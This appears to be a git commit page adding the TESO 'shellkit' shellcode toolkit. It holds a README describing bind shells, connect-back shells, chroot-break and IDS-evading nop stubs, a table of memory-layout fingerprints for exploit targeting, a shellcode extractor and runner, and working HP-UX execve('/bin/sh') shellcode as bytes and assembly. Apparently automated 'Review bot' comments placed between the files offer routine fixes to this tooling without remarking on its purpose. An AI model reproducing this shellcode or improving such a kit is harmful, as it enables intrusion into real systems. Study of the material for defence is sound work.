authorRoot THC2026-02-24 12:42:47 +0000
committerRoot THC2026-02-24 12:42:47 +0000
commitc9cbeced5b3f2bdd7407e29c0811e65954132540 (patch)
treeaefc355416b561111819de159ccbd86c3004cf88 /other/shellkit
parent073fe4bf9fca6bf40cef2886d75df832ef4b6fca (diff)
initial
Diffstat (limited to 'other/shellkit')
-rw-r--r--other/shellkit/Makefile24
-rw-r--r--other/shellkit/README187
-rw-r--r--other/shellkit/SYSTEMS134
-rw-r--r--other/shellkit/codedump.c93
-rw-r--r--other/shellkit/hppa.c12
-rw-r--r--other/shellkit/hppa.h7
-rw-r--r--other/shellkit/hppa.obin0 -> 8212 bytes
-rw-r--r--other/shellkit/hppa_hpux.c36
-rw-r--r--other/shellkit/hppa_hpux.h10
-rw-r--r--other/shellkit/hppa_hpux.obin0 -> 9000 bytes
-rw-r--r--other/shellkit/hppa_hpux/Makefile14
-rw-r--r--other/shellkit/hppa_hpux/build.sh57
-rw-r--r--other/shellkit/hppa_hpux/execvesh.s36
-rw-r--r--other/shellkit/hppa_hpux/execvesh.s-backup32
-rw-r--r--other/shellkit/mips.c143
-rw-r--r--other/shellkit/mips.h19
-rw-r--r--other/shellkit/mips.obin0 -> 13276 bytes
-rw-r--r--other/shellkit/mips_irix.c231
-rw-r--r--other/shellkit/mips_irix.h17
-rw-r--r--other/shellkit/mips_irix.obin0 -> 13984 bytes
-rw-r--r--other/shellkit/mips_irix/Makefile22
-rw-r--r--other/shellkit/mips_irix/README25
-rw-r--r--other/shellkit/mips_irix/chmod.s49
-rw-r--r--other/shellkit/mips_irix/chroot.s60
-rw-r--r--other/shellkit/mips_irix/connectsh.s109
-rw-r--r--other/shellkit/mips_irix/execvesh.s36
-rw-r--r--other/shellkit/mips_irix/exit.s29
-rw-r--r--other/shellkit/mips_irix/portshellsh.s126
-rw-r--r--other/shellkit/mips_irix/read.s51
-rw-r--r--other/shellkit/mips_irix/setgid.s30
-rw-r--r--other/shellkit/mips_irix/setreuid.s32
-rw-r--r--other/shellkit/shellcode.c61
-rw-r--r--other/shellkit/shellcode.h62
-rw-r--r--other/shellkit/shellcode.obin0 -> 11192 bytes
-rw-r--r--other/shellkit/shellkitbin0 -> 122697 bytes
-rw-r--r--other/shellkit/shellkit.c123
-rw-r--r--other/shellkit/shellkit.h31
-rw-r--r--other/shellkit/sparc.c140
-rw-r--r--other/shellkit/sparc.h10
-rw-r--r--other/shellkit/sparc.obin0 -> 13216 bytes
-rw-r--r--other/shellkit/sparc_solaris.c58
-rw-r--r--other/shellkit/sparc_solaris.h6
-rw-r--r--other/shellkit/sparc_solaris.obin0 -> 9628 bytes
-rw-r--r--other/shellkit/sparc_solaris/AUTHORS2
-rw-r--r--other/shellkit/sparc_solaris/NOTES11
-rw-r--r--other/shellkit/sparc_solaris/execve.s20
-rw-r--r--other/shellkit/sparc_solaris/exit.s10
-rw-r--r--other/shellkit/sparc_solaris/setgid.s12
-rw-r--r--other/shellkit/sparc_solaris/setreuid.s14
-rw-r--r--other/shellkit/splocoderbin0 -> 16519 bytes
-rw-r--r--other/shellkit/splocoder.c184
-rw-r--r--other/shellkit/tmp/hpux-tools.tar.gzbin0 -> 2550 bytes
-rw-r--r--other/shellkit/tmp/hpux-tools/Makefile5
-rw-r--r--other/shellkit/tmp/hpux-tools/README10
-rw-r--r--other/shellkit/tmp/hpux-tools/sample-one/Makefile10
-rw-r--r--other/shellkit/tmp/hpux-tools/sample-one/README5
-rw-r--r--other/shellkit/tmp/hpux-tools/sample-one/exploit.c123
-rw-r--r--other/shellkit/tmp/hpux-tools/sample-one/vuln.c34
-rw-r--r--other/shellkit/tmp/hpux-tools/shell-one.s39
-rw-r--r--other/shellkit/tmp/hpux-tools/shell-tree.s31
-rw-r--r--other/shellkit/tmp/hpux-tools/shell-two.s41
-rw-r--r--other/shellkit/tmp/hpux_bof.pdfbin0 -> 243787 bytes
-rw-r--r--other/shellkit/x86.c124
-rw-r--r--other/shellkit/x86.h21
-rw-r--r--other/shellkit/x86.obin0 -> 12280 bytes
-rw-r--r--other/shellkit/x86_bsd.c73
-rw-r--r--other/shellkit/x86_bsd.h12
-rw-r--r--other/shellkit/x86_bsd.obin0 -> 9768 bytes
-rw-r--r--other/shellkit/x86_bsd/FIXME_chmod.s43
-rw-r--r--other/shellkit/x86_bsd/bindshell.s59
-rw-r--r--other/shellkit/x86_bsd/connectshbin0 -> 6100 bytes
-rw-r--r--other/shellkit/x86_bsd/connectsh.s51
-rw-r--r--other/shellkit/x86_bsd/execveshbin0 -> 6034 bytes
-rw-r--r--other/shellkit/x86_bsd/execvesh.s31
-rw-r--r--other/shellkit/x86_bsd/exit.s18
-rw-r--r--other/shellkit/x86_bsd/spset.s36
-rw-r--r--other/shellkit/x86_linux.c352
-rw-r--r--other/shellkit/x86_linux.h32
-rw-r--r--other/shellkit/x86_linux.obin0 -> 20216 bytes
-rw-r--r--other/shellkit/x86_linux/AUTHORS5
-rw-r--r--other/shellkit/x86_linux/chmod.s23
-rw-r--r--other/shellkit/x86_linux/chroot.s34
-rw-r--r--other/shellkit/x86_linux/codedumpbin0 -> 6244 bytes
-rw-r--r--other/shellkit/x86_linux/connect.s61
-rw-r--r--other/shellkit/x86_linux/execvebin0 -> 5988 bytes
-rw-r--r--other/shellkit/x86_linux/execve.s22
-rw-r--r--other/shellkit/x86_linux/exit.s14
-rw-r--r--other/shellkit/x86_linux/portshell.s73
-rw-r--r--other/shellkit/x86_linux/portshell_slice.s77
-rw-r--r--other/shellkit/x86_linux/read.s22
-rw-r--r--other/shellkit/x86_linux/setgid.s14
-rw-r--r--other/shellkit/x86_linux/setreuid.s16
-rw-r--r--other/shellkit/x86_linux/setuid.s14
-rw-r--r--other/shellkit/x86_linux/spset.s36
-rw-r--r--other/shellkit/x86_linux/xor.s24
-rw-r--r--other/shellkit/x86_noptest.c25
-rw-r--r--other/shellkit/x86_solaris/README7
-rw-r--r--other/shellkit/x86_solaris/bindshell.s68
-rw-r--r--other/shellkit/x86_solaris/connectsh.s60
-rw-r--r--other/shellkit/x86_solaris/execve.s32
-rw-r--r--other/shellkit/x86_solaris/exit.s24
101 files changed, 4166 insertions, 0 deletions
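--- /dev/null
+++ b/other/shellkit/Makefile
@@ -0,0 +1,24 @@
+
+#DFLAGS=-O2
+DFLAGS=-g -ggdb
+CC=gcc
+CFLAGS=$(DFLAGS) -Wall
+OBJS= shellcode.o \
+ hppa.o hppa_hpux.o \
+ mips.o mips_irix.o \
+ sparc.o sparc_solaris.o \
+ x86.o x86_bsd.o x86_linux.o \
+
+all: shellkit splocoder
+
+clean:
+ rm -f *.o shellkit
+ rm -f splocoder
+
+shellkit: $(OBJS)
+ $(CC) $(CFLAGS) -o shellkit shellkit.c $(OBJS)
+
+splocoder: splocoder.c
+ $(CC) $(CFLAGS) -o splocoder splocoder.c
+
+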
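Review bot: The `shellkit: $(OBJS)` rule on lines 18-19 compiles shellkit.c inside the recipe but does not list it (or shellkit.h) as a prerequisite, so editing shellkit.c after a first build never triggers a relink; change the rule head to `shellkit: shellkit.c shellkit.h $(OBJS)`. The build products this rule produces and that `clean` deletes are also committed in this same commit (hppa.o, mips.o, shellcode.o, the shellkit and splocoder binaries, per the diffstat) and will go stale on the first source change; they belong in a .gitignore rather than in the tree. The trailing backslash on line 10 continues OBJS into the blank line 11, which GNU make tolerates but which reads as an unfinished list.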
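--- /dev/null
+++ b/other/shellkit/README
@@ -0,0 +1,187 @@
+
+TEAM TESO shellkit - your complete shellcode toolkit
+====================================================
+preliminary README file
+
+
+Conditions and rules to be obeyed by the shellcodes
+===================================================
+
+To construct generic shellcodes one has to state the exact details and
+requirements of each shellcode. The list below is what every shellcode within
+the shellkit has to obey.
+
+Conditions the shellcode encounters:
+
+ - Shellcode memory itself is writeable
+ - No register being properly set except the stack pointer
+
+Requirements to the shellcode:
+
+ - Do not contain NUL (0x00), line-termination (0x0a, 0x0d) and
+ format-directive (0x25 = '%') bytes
+ - Do not expect to be terminated by a NUL ('\0') character
+ - Working on heap and stack (i.e. any writeable and executeable memory)
+
+Suggestions (i.e. should be ...):
+
+ - Well tested on most common systems to be expected on the
+ architecture the shellcode runs on (i.e Solaris 2.[5678] on sparc,
+ IRIX 5.3, 6.[2345] on mips)
+ - Optimized for (in order of importance): stability, size
+
+
+Types of shellcodes to create
+=============================
+
+This is a UNIX listing, since most shellcodes are not doable on Windows, so
+this listing is for Unix derivates only. For the "configureable" values of the
+shellcodes there are setup functions to set the values within the shellcode.
+
+The listing is split into three different categories: chainables, local and
+remote. The chainable codes work as stubs to prepend other shellcodes with.
+This is done change certain settings in the environment, such as getting rid of
+chroot, certain uid's and the like. The local shellcodes are for use in locally
+exploitable vulnerabilities, while the remote shellcodes are designed to assist
+you with remote exploitation over the network.
+
+
+Chainables (6 codes)
+--------------------
+Chainable shellcodes should not influence the processing of the following
+shellcode in violation to the condition above.
+
+ - chrootbreak, which breaks out of a chroot environment if possible on that
+ architecture (using the best and most promising method)
+ - read(fd, behind-myself, len), which reads len bytes from fd behind itself
+ and executes them. on certain architectures special considerations for
+ cache problems have to be obeyed
+ - setreuid(?,?), which sets the (e)uid to a configureable value
+ - setgid(?), which sets the gid to a configurable value
+ - spset, which sets the stackpointer before the shellcode
+
+ - nop shellcode (see below for description)
+
+The "nop shellcode" is actually a function that will create a variadic amount
+of nop space which is not just one opcode but a mix. This is done to evade IDS
+systems. The generated nop-code should behave the same way a normal chainable
+shellcode would (i.e. not violating the conditions of the shellcode).
+
+
+Local (2 codes)
+---------------
+ - chmod/chown/exit, which chowns and chmods a pathname of your choice, then
+ exits
+ - execve-sh, which executes a /bin/sh
+ - exit, which will just exit with an undetermined exit code
+
+
+Remote (2 codes)
+----------------
+ - portshell-sh, which listens on a defineable port and executes a /bin/sh
+ once a connection is experienced
+ - connect-sh, which connects to a defineable ip and port and executes a
+ /bin/sh once it is connected
+
+
+Architectures
+=============
+
+arch os person(s)
+------- --------------- -----------------------------------------
+HPPA HP-UX caddis
+MIPS IRIX scut
+RS6000 AIX edi
+SPARC Solaris caddis, skyper
+x86 Solaris plasmoid
+x86 Windows NT halvar
+x86 Linux lorian, smiler
+x86 *BSD dvorak, smiler
+------- --------------- -----------------------------------------
+
+
+Developing
+==========
+
+Please include all custom build utilities, Makefiles (!) and maybe specific
+README files in the appropiate directory, so other people can join the fun or
+modify the codes at source level.
+
+
+Testing
+=======
+
+The shellcodes have to be tested thoroughly and on as much different systems as
+possible.
+
+
+Naming
+======
+
+Code Strings
+
+ <arch>-<os>-<code>
+
+arch is one of:
+
+ hppa
+ mips
+ rs6000
+ sparc
+ x86
+
+os is one of:
+
+ aix
+ bsd
+ hpux
+ irix
+ linux
+ solaris
+ windowsnt
+
+code is one of:
+
+ chmod
+ chroot
+ connectsh
+ execvesh
+ exit
+ portshellsh
+ read
+ setreuid
+ setgid
+ spset
+
+Example: The portshell shellcode for the MIPS architecture under the IRIX
+ operating system would be identified with "mips-irix-portshellsh"
+
+
+Additional information
+======================
+
+Please use the included 'splocoder' utility to dump important system
+information of the various architectures. There will be a documentation of what
+the fields mean and how they can be used. Soon.
+
+
+Credits
+=======
+
+This shellcode toolkit is the result of the hard work of numerous persons, here
+is a list of the persons involved.
+
+XXX/TODO: update, add missing persons
+
+ acpizer - splocoder
+ lorian - x86 linux/bsd codes
+ palmers - x86 linux codes
+ scut - mips irix, hppa hpux codes, framework and docs
+ smiler - x86 bsd codes
+ stealth - x86 bsd codes
+
+
+==
+vi:fo=tcrq:tw=79:
+
+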
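--- /dev/null
+++ b/other/shellkit/SYSTEMS
@@ -0,0 +1,134 @@
+# splocoder output database -- team teso
+# add your system here
+#
+# thanks to all the people who send me in fingerprints, you know who you are
+# :-)
+
+# BSD systems
+FreeBSD-4.2-RELEASE-i386 le stackdown 4 4
+ data bss stack env 08049a70 08049c80 bfbffa60 bfbffb64
+ M: zero neg big small tiny 0804c030 00000000 0804d000 0814d000 0804c040
+
+FreeBSD-4.3-RC-i386 le stackdown 4 4
+ data bss stack env 08049a70 08049c80 bfbffa78 bfbffb7c
+ M: zero neg big small tiny 0804c030 00000000 0804d000 0814d000 0804c040
+
+FreeBSD-4.3-RELEASE-i386 le stackdown 4 4
+ data bss stack env 08049a70 08049c80 bfbffba0 bfbffca4
+ M: zero neg big small tiny 0804c030 00000000 0804d000 0814d000 0804c040
+
+NetBSD-1.5-i386 le stackdown 4 4
+ data bss stack env 08049dd8 08049fe0 bfbfd614 bfbfdb6c
+ M: zero neg big small tiny 0805c030 00000000 0805d000 0815d000 0805c040
+
+OpenBSD-2.6-i386 le stackdown 4 4
+ data bss stack env 000030e8 0000313c dfbfd958 dfbfdeac
+ M: zero neg big small tiny 00015030 00000000 00016000 00116000 00015040
+
+OpenBSD-2.8-alpha le stackdown 4 8
+ data bss stack env 12001d0d5 12001dff8 1fffff810 1fffff890
+ M: zero neg big small tiny 120026060 00000000 120028000 120128000 120026070
+
+OpenBSD-2.8-i386 le stackdown 4 4
+ data bss stack env 000030ec 00003148 dfbfd658 dfbfdbac
+ M: zero neg big small tiny 00015030 00000000 00016000 00116000 00015040
+
+OpenBSD-2.9-i386 le stackdown 4 4
+ data bss stack env 000030ec 00003148 dfbfd3dc dfbfd930
+ M: zero neg big small tiny 00007030 00000000 00008000 00108000 00007040
+
+OpenBSD-2.9-sparc be stackdown 4 4
+ data bss stack env 00004110 00004178 f7fff5d8 f7fffb4c
+ M: zero neg big small tiny 00016030 00000000 00017000 00117000 00016040
+
+# HPUX systems
+HP-UX-B.10.20-9000/715 be stackup 4 4
+ data bss stack env 400010c0 40001188 7b03a530 7b03a3ac
+ M: zero neg big small tiny 400031e0 00000000 400031e8 401031f0 40103260
+
+HP-UX-B.10.20-9000/735 be stackup 4 4
+ data bss stack env 400010c0 40001188 7b03a590 7b03a414
+ M: zero neg big small tiny 400031e0 00000000 400031e8 401031f0 40103260
+
+# IRIX systems
+IRIX-6.5-IP20 be stackdown 4 4
+ data bss stack env 100132f8 10013410 7fff2f00 7fff2f6c
+ M: zero neg big small tiny 10014010 10014020 10014090 10114098 10014030
+
+IRIX64-6.5-IP27 be stackdown 4 4
+ data bss stack env 100140f8 100141c0 7ffe3e70 7ffe3f1c
+ M: zero neg big small tiny 10015010 10015020 10015090 10115098 10015030
+
+# Linux systems
+Linux-2.2.13-i486 le stackdown 4 4
+ data bss stack env 080499f0 08049b20 bffff7a8 bffff98c
+ M: zero neg big small tiny 08049b90 00000000 40117008 08049ba0 08049c08
+
+Linux-2.2.19-i586 le stackdown 4 4
+ data bss stack env 08049a10 08049b40 bffff3e8 bffff5cc
+ M: zero neg big small tiny 08049d40 00000000 00227008 08049d50 08049db8
+
+Linux-2.2.1-mips le stackdown 4 4
+ data bss stack env 10000020 100000d4 7ffffb10 7ffffbdc
+ M: zero neg big small tiny 10000150 00000000 2ac2d008 10000160 100001c8
+
+Linux-2.2.19pre17-i686 le stackdown 4 4
+ data bss stack env 080499d0 08049ae0 bffffbac bffffdac
+ M: zero neg big small tiny 08049b50 00000000 400f3008 08049b60 08049bc8
+
+Linux-2.2.19-sparc64 be stackdown 4 4
+ data bss stack env 00021ef0 000220e4 effffb68 effffdcc
+ M: zero neg big small tiny 00022138 00000000 7012e008 00022148 000221b0
+
+Linux-2.4.6-i686 le stackdown 4 4
+ data bss stack env 08049d50 08049e60 bffff9ac bffffbac
+ M: zero neg big small tiny 08049ed0 00000000 40142008 08049ee0 08049f48
+
+Linux-2.4.7-4GB-i686 le stackdown 4 4
+ data bss stack env 08049a4c 08049b60 bfffefac bffff1ac
+ M: zero neg big small tiny 08049bd0 00000000 40143008 08049be0 08049c48
+
+Linux-2.4.4-ppc be stackdown 4 4
+ data bss stack env 10010fa8 1001107c 7ffff9d8 7ffffa8c
+ M: zero neg big small tiny 100111a8 00000000 30028008 100111b8 10011220
+
+Linux-2.4.8-sparc64 be stackdown 4 4
+ data bss stack env 00021ef0 00022100 effff868 effffacc
+ M: zero neg big small tiny 00022150 00000000 70170008
+
+# alpha
+OSF1-V5.0-alpha le stackdown 4 8
+ data bss stack env 1400001b8 140000300 11fffbf50 11fffc028
+ M: zero neg big small tiny 00000000 00000000 140004000 140002100 140002180
+
+# Solaris systems
+SunOS-5.6-sun4u be stackdown 4 4
+ data bss stack env 00021284 00021470 effff5da effffb54
+ M: zero neg big small tiny 00021488 00000000 00021888 00121890 00021498
+
+SunOS-5.7-sun4u be stackdown 4 4
+ data bss stack env 00021190 00021350 ffbef3a0 ffbef92c
+ M: zero neg big small tiny 00021368 00000000 00021768 00121770 00021378
+
+SunOS-5.8-sun4d be stackdown 4 4
+ data bss stack env 00020d10 00021008 dffff3e0 dffff9dc
+ M: zero neg big small tiny 00021060 00000000 00021460 00121468 00021070
+
+SunOS-5.8-sun4m be stackdown 4 4
+ data bss stack env 00021180 00021340 effff808 effffd94
+ M: zero neg big small tiny 00021358 00021368 00021758 00121760 00021378
+
+SunOS-5.8-sun4u be stackdown 4 4
+ data bss stack env 00020d00 00020ff4 ffbeefe8 ffbef5e4
+ M: zero neg big small tiny 00021050 00021060 00021450 00121458 00021070
+
+# exotics
+CYGWIN_NT-4.0-1.1.6(0.30/3/2) le stackdown 4 4
+ data bss stack env 00402004 0040305c 0240fe34 0a010008
+ M: zero neg big small tiny 0a0104c0 0a0104d0 0a0104e0 0a1104e8 0a110550
+
+CYGWIN_NT-5.0-1.3.3s(0.44/3/2) le stackdown 4 4
+ data bss stack env 00402004 0040305c 0240fe34 0a010008
+ M: zero neg big small tiny 0a0104b8 0a0104c8 0a0104d8 0a1104e0 0a110548
+
+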
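Review bot: The `Linux-2.4.8-sparc64` record (line 97) lists only three values after `M: zero neg big small tiny` where every other entry carries five, so its `small` and `tiny` columns are missing and any reader that splits the row on whitespace will either mis-assign the fields or read past the end. Either complete the fingerprint or mark the two missing cells explicitly (a `-` placeholder, or drop the record until it can be re-captured). The file header says "add your system here" but does not state the column format; a comment line such as `# <name> <endian> <stackdir> <sizeof int> <sizeof long>` above the first entry would let contributors validate their rows.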
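--- /dev/null
+++ b/other/shellkit/codedump.c
@@ -0,0 +1,93 @@
+/* shellcode extraction utility,
+ * by type / teso, small mods by scut.
+ */
+
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <ctype.h>
+
+#ifdef IRIX
+#include <sys/cachectl.h>
+#endif
+
+#ifdef HPUX
+extern char * cbegin;
+extern char * cend;
+#else
+extern void cbegin ();
+extern void cend ();
+#endif
+
+typedef void (* fptr)(void);
+
+int
+bad (unsigned char u);
+
+
+int
+main (int argc, char *argv[])
+{
+ int i,
+ bbytes = 0;
+ unsigned char * buf = (unsigned char *) cbegin;
+
+ unsigned char ebuf[1024];
+ fptr ebuf_p = (fptr) &ebuf[0];
+
+
+ fprintf (stderr, "/* %lu byte shellcode */\n",
+ (unsigned long int) cend - (unsigned long int) cbegin);
+
+ for (i = 0 ; buf < (unsigned char *) cend; ++buf) {
+ if (i % 12 == 0 && buf > (unsigned char *) cbegin)
+ printf ("\n");
+ if (i % 12 == 0)
+ printf ("\"");
+
+ if (bad (*buf & 0xff)) {
+ printf ("_\\x%02x_", *buf & 0xff);
+ bbytes += 1;
+ } else {
+ printf ("\\x%02x", *buf & 0xff);
+ }
+
+ if (++i >= 12) {
+ i = 0;
+ printf ("\"");
+ }
+ }
+ if (i % 12 == 0)
+ printf (";\n");
+ else
+ printf ("\";\n");
+
+ printf("\n");
+
+ fprintf (stderr, "bad bytes = %d\n", bbytes);
+
+ if (argc > 1) {
+ memcpy (ebuf, cbegin, (unsigned long int) cend -
+ (unsigned long int) cbegin);
+#ifdef IRIX
+ memcpy (ebuf + ((unsigned long int) cend -
+ (unsigned long int) cbegin), "/bin/sh\x42_ABCDEFGHIJKLMNOPQRSTUVWXYZ", 40);
+ cacheflush (ebuf, sizeof (ebuf), BCACHE);
+#endif
+ ebuf_p ();
+ }
+
+ exit (EXIT_SUCCESS);
+}
+
+
+int
+bad (unsigned char u)
+{
+ if (u == '\x00' || u == '\x0a' || u == '\x0d' || u == '\x25')
+ return (1);
+
+ return (0);
+}
+
+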
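Review bot: `memcpy` on lines 70 and 73 is used without `#include <string.h>`, so it is only implicitly declared (an error under C99-and-later compilers), and the copy into the fixed `ebuf[1024]` is unbounded: a code longer than 1024 bytes (1024 minus the 40 appended bytes under IRIX) overruns the stack buffer before anything is even executed. Add the include and guard the copy, e.g. `if ((size_t) ((char *) cend - (char *) cbegin) > sizeof ebuf) { fprintf (stderr, "code does not fit ebuf\n"); exit (EXIT_FAILURE); }` before line 70. The `argc > 1` self-test path also depends on the stack being executable, so on any system enforcing NX/W^X `ebuf_p ()` will fault rather than run; a one-line comment on line 69 stating that requirement would save the next person a confused debugging session. `argv` is unused and could be left unnamed or cast to void to keep `-Wall -Wextra` builds quiet.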
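--- /dev/null
+++ b/other/shellkit/hppa.c
@@ -0,0 +1,12 @@
+/* hppa.c - generic pa-risc functions
+ *
+ * by team teso
+ */
+
+#include <stdio.h>
+#include <stdlib.h>
+#include "shellcode.h"
+#include "hppa.h"
+
+
+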
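--- /dev/null
+++ b/other/shellkit/hppa.h
@@ -0,0 +1,7 @@
+
+#ifndef HPPA_H
+#define HPPA_H
+
+
+#endif
+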
diff --git a/other/shellkit/hppa.o b/other/shellkit/hppa.o
new file mode 100644
index 0000000..e54e3fe
--- /dev/null
+++ b/other/shellkit/hppa.o
Binary files differ
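--- /dev/null
+++ b/other/shellkit/hppa_hpux.c
@@ -0,0 +1,36 @@
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include "shellcode.h"
+#include "hppa.h"
+
+
+/* tested on: HP-UX B.10.20 A 9000/735
+ * lsd people used execv, we use execve, which enlarges our code by 12
+ * bytes
+ */
+shellcode hppa_hpux_execvesh = {
+ "hppa-hpux-execvesh",
+ 48,
+ "\xeb\x5f\x1f\xfd\xb4\x16\x70\x76\xb7\x5a\x40\x3a"
+ "\x0f\xc0\x12\x88\x0f\xda\x12\x80\x0b\xc0\x02\x99"
+ "\x0b\x18\x02\x98\x22\xa0\x08\x01\xe6\xa0\xe0\x08"
+ "\x0f\x40\x12\x0e\x2f\x62\x69\x6e\x2f\x73\x68\x41",
+};
+
+
+shellcode * hppa_hpux_shellcodes[] = {
+ &hppa_hpux_execvesh,
+ NULL,
+};
+
+arch hppa_hpux = {
+ "hppa-hpux",
+ 4,
+ NULL /* hppa_nop */,
+ hppa_hpux_shellcodes,
+};
+
+
+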
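Review bot: The `arch hppa_hpux` initializer at the bottom of the file installs `NULL /* hppa_nop */` as the nop generator, but nothing here records whether the consumers of the `arch` table (shellkit.c, not visible in this hunk) tolerate a NULL there; if they call through the pointer unconditionally, any nop request for this arch dereferences NULL. Either state the contract next to it, `/* no hppa nop generator yet; callers must test for NULL before use */`, or install a stub that reports "unsupported" instead. The file also includes hppa.h but not hppa_hpux.h, so the definition of `hppa_hpux` is never checked against the declaration the rest of the tree uses; add `#include "hppa_hpux.h"` alongside the other includes. The `48` on line 15 duplicates the literal's length by hand; a comment saying it must track the four 12-byte rows below would help whoever edits the bytes next.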
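--- /dev/null
+++ b/other/shellkit/hppa_hpux.h
@@ -0,0 +1,10 @@
+
+#ifndef HPPA_HPUX_H
+#define HPPA_HPUX_H
+
+#include "shellcode.h"
+
+arch hppa_hpux;
+
+#endif
+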
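Review bot: `arch hppa_hpux;` on line 7 is a tentative definition rather than a declaration, so every translation unit that includes this header defines the object; that links only while the toolchain merges common symbols and produces duplicate-symbol errors under `-fno-common`, the default since GCC 10. It should read `extern arch hppa_hpux;`, leaving the one real definition in hppa_hpux.c. The same pattern is worth checking in the sibling per-arch headers added by this commit (mips_irix.h, sparc_solaris.h, x86_*.h), which are outside this view.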
diff --git a/other/shellkit/hppa_hpux.o b/other/shellkit/hppa_hpux.o
new file mode 100644
index 0000000..28141b6
--- /dev/null
+++ b/other/shellkit/hppa_hpux.o
Binary files differ
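--- /dev/null
+++ b/other/shellkit/hppa_hpux/Makefile
@@ -0,0 +1,14 @@
+
+#DFLAGS=-O2
+DFLAGS=-g -ggdb
+CC=gcc
+CFLAGS=$(DFLAGS) -Wall
+
+all:
+ $(CC) $(CFLAGS) -o execvesh execvesh.s
+
+clean:
+ rm -f *.o
+ rm -f chmod chroot connectsh execvesh exit portshellsh read \
+ setgid setreuid
+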
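Review bot: `all:` on line 7 has no prerequisites, so `make` reassembles execvesh on every invocation and can never tell whether execvesh.s changed. Split it into `all: execvesh` and `execvesh: execvesh.s` with the existing recipe under the second rule; `all` and `clean` should also be declared `.PHONY`. The `clean` list on lines 12-13 removes eight programs that this Makefile never builds, which suggests it was copied from another arch directory; trimming it to what `all` actually produces keeps the two rules honest.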
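--- /dev/null
+++ b/other/shellkit/hppa_hpux/build.sh
@@ -0,0 +1,57 @@
+#!/bin/sh
+
+#c89 -c -o object.o $1
+#objdump -D cbegin $1 | egrep "[0-9a-f]+:" | cut -c 7- | \
+# awk '{ printf ("\t\"\\x%s\\x%s\\x%s\\x%s\"\t/* %s\t*/\n", \
+# $1, $2, $3, $4, $5 $6 $7 $8 $9) }' > \
+# object.h
+#gcc -o $2 ../codedump.c -DHPUX
+#rm -f object.h
+
+# i knew learning awk would repay some day ;-P
+objdump -D execvesh | \
+awk '
+ function pbyte (CHAR) {
+ if (match (CHAR, /(00)|(0a)|(0d)|(25)/))
+ printf ("_");
+ printf ("\\x%s", CHAR);
+ if (match (CHAR, /(00)|(0a)|(0d)|(25)/))
+ printf ("_");
+ return;
+ }
+
+ BEGIN {
+ foo = 0;
+ }
+
+ /cbegin/ {
+ foo = 1;
+ ccount = 0;
+ printf ("unsigned char shellcode[] =");
+ }
+
+ foo == 1 && /cend/ {
+ foo = 0;
+ if (ccount == 0) {
+ printf (";\n");
+ } else {
+ printf ("\";\n");
+ }
+ }
+
+ foo == 1 && /[0123456789abcdef]+\:/ {
+ if (ccount == 0) {
+ printf ("\n\t\"");
+ }
+ pbyte($2);
+ pbyte($3);
+ pbyte($4);
+ pbyte($5);
+ ccount += 4;
+
+ if (ccount == 12) {
+ ccount = 0;
+ printf ("\"")
+ }
+ }'
+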
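Review bot: The live pipeline on line 12 hard-codes `objdump -D execvesh`, whereas the commented-out version above it took the object as `$1`, so the script cannot be reused for any other code in this directory. Take the input from the command line, `objdump -D "${1:?usage: build.sh <object>}" | \`, and add `set -e` after the shebang so a missing objdump or input file fails loudly instead of emitting an empty but successful-looking declaration. The `pbyte($2)`..`pbyte($5)` calls assume objdump prints exactly four two-digit byte columns per instruction line, which is true for the fixed-width PA-RISC output but should be stated in a comment, since the `/cbegin/` and `/cend/` patterns will also match any symbol that merely contains those substrings. The `_` markers around forbidden bytes deliberately make the generated C string fail to compile until they are dealt with; a comment saying so would stop someone from "fixing" pbyte.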
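--- /dev/null
+++ b/other/shellkit/hppa_hpux/execvesh.s
@@ -0,0 +1,36 @@
+
+ .LEVEL 1.1
+
+ .SPACE $TEXT$
+ .SUBSPA $CODE$,QUAD=0,ALIGN=8,ACCESS=44
+
+ .EXPORT main,ENTRY,PRIV_LEV=3,ARGW0=GR,ARGW1=GR
+main
+ bl cbegin, %r1
+ nop
+
+ .align 4
+
+ .SUBSPA $DATA$
+ .EXPORT cbegin
+
+cbegin
+ bl moo,%r26
+moo
+ addi,> 0x3b,%r0,%r22
+ addi,< 0x1d,%r26,%r26
+ stw %r0,4(%sp)
+ stw %r26,0(%sp)
+ xor %r0,%sp,%r25
+ xor %r24,%r24,%r24
+
+ ldil L%0xc0000004,%r21
+ ble R%0xc0000004(%sr7,%r21)
+ stbs %r0,7(%r26)
+
+ .STRING "/bin/sh\x41"
+
+ .EXPORT cend
+cend
+ nop
+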
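Review bot: The file has no header comment, so a reader has to reverse the sequence from `cbegin` (line 17) to learn its assumptions: PA-RISC 1.1 (`.LEVEL 1.1`), the HP-UX B.10.20 box named in hppa_hpux.c, and writable code memory, since `stbs %r0,7(%r26)` on line 29 patches the trailing byte of the `.STRING` on line 31 in place and is why the README lists "shellcode memory itself is writeable" as a precondition. A short header stating the target, that in-place write, the byte constraints from the README (no 0x00, 0x0a, 0x0d, 0x25) and the fact that `main` on lines 8-10 exists only so build.sh can run objdump over a linked object would make the file self-describing. The numeric constants on lines 20, 21 and 27-28 (`0x3b`, `0x1d`, `0xc0000004`) should be given `.EQU` names with a comment on what each is, rather than left as magic numbers; `0x1d` in particular is an offset into this very code and will silently go wrong if an instruction is inserted above line 21. The `addi,>` / `addi,<` nullification conditions also deserve a one-word comment, since they look like typos to anyone not fluent in PA-RISC.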
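--- /dev/null
+++ b/other/shellkit/hppa_hpux/execvesh.s-backup
@@ -0,0 +1,32 @@
+
+ .LEVEL 1.1
+
+ .SPACE $TEXT$
+
+ .align 4
+ .EXPORT cbegin,PRIV_LEV=3,ARGW0=GR,ARGW1=GR,RTNVAL=GR
+
+cbegin
+ .PROC
+ .CALLINFO FRAME=128,CALLS,SAVE_RP,SAVE_SP,ENTRY_GR=3
+
+ bl moo,%r26
+moo
+ xor %r25,%r25,%r25
+ addi,< 0x11,%r26,%r26
+ stbs %r0,7(%r26)
+ ldil L%0xc0000004,%r21
+ ble R%0xc0000004(%sr7,%r21)
+ ldo 0xb(%r0),%r22
+
+ .STRING "/bin/sh\x41"
+
+ .PROCEND
+
+
+ .EXPORT cend,PRIV_LEV=3,ARGW0=GR,ARGW1=GR,RTNVAL=GR
+cend
+ .PROC
+ .CALLINFO FRAME=128,CALLS,SAVE_RP,SAVE_SP,ENTRY_GR=3
+
+ .PROCEND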
